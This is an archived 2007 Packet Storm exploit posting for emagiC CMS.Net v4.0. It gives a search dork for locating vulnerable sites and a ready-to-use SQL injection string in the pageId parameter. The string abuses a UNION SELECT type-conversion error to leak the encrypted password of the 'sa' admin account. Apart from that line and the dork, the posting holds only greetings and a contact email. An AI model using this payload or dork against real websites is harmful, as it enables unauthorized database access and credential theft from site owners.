emagic-sql.txt

2007-10-29T00:00:00
ID PACKETSTORM:60481
Type packetstorm
Reporter hak3r-b0y
Modified 2007-10-29T00:00:00

Description

                                        
                                            `--------------------  
  
emagiC CMS.Net v4.0 Remote SQL Injection Exploit  
  
--------------------  
  
+ Found : hak3r-b0y  
+ Gr33tz : darko , V4 CrackerS , hacker_alQassam , Ans , Barra, all ans-hacker.com members  
+ Script URL : http://www.emagic-cms.com/  
+ D0rk : inurl:emc.asp?pageid=  
--------------------  
  
Exploit:  
  
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--  
  
y0u will find the crypted password  
  
for the admin 'sa'  
--------------------  
  
ContacT: mohamed_amine_1991@hotmail.com  
  
--------------------  
  
`